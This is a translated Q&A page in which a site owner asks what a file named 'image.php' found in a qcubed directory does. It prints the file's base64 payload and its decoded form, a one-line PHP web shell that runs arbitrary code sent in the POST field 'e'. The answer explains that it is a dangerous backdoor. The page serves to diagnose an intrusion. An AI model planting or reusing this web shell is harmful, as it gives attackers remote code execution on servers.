base64编码的$ _POST ['e']变量上的eval实际做什么? [英] What does eval on base64 encoded $_POST['e'] variable actually do?
问题描述
好的,这就是我在Google上搜索过的内容:
Ok so here's what I've googled:
似乎在qcubed目录中上传了一个名为"image.php"的上传文件.
It seems there is an uploaded file named "image.php" that is uploaded in a qcubed directory.
该image.php文件包含以下base64代码:
That image.php file contains the following base64 code:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
解码后添加到此:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
在搜索输出的字符串时,我在其他站点上发现了类似的qcubed漏洞.
Searching for the outputed string I found simillar qcubed vulnerabilities on other sites.
解码我得到的最后一个回显的字符串:
Decoding the last echoed string I got:
196.231-172.28:ifacermpubmice:afac42eri02
我真的不了解它的作用(使用: http://ostermiller.org/calc /encode.html ).
Which I really don`t understand what it does (using:http://ostermiller.org/calc/encode.html).
您能解释一下我在这里面临的特别情况吗? 为了解决此问题,我应该解决什么安全漏洞?
Can you please explain me what in particular I`m facing here? What security vulnerability I should adress in order to fix this?
推荐答案
该脚本将执行从e POST变量获取的任何PHP代码,这当然是一个可怕的,最危险的漏洞.
The script will execute any PHP code it gets from the e POST variable, which of course is a horrible, most dangerous vulnerability.
echo语句可能是对攻击脚本的确认,即安装了正确的版本.
The echo statement might be a confirmation for the attacking script that the correct version is installed or something.
但是,仅当image.php文件可以在该目录中实际执行时,这才是危险的.首先,不知道文件是如何到达那里的,就很难给出建议.
However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
这篇关于base64编码的$ _POST ['e']变量上的eval实际做什么?的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
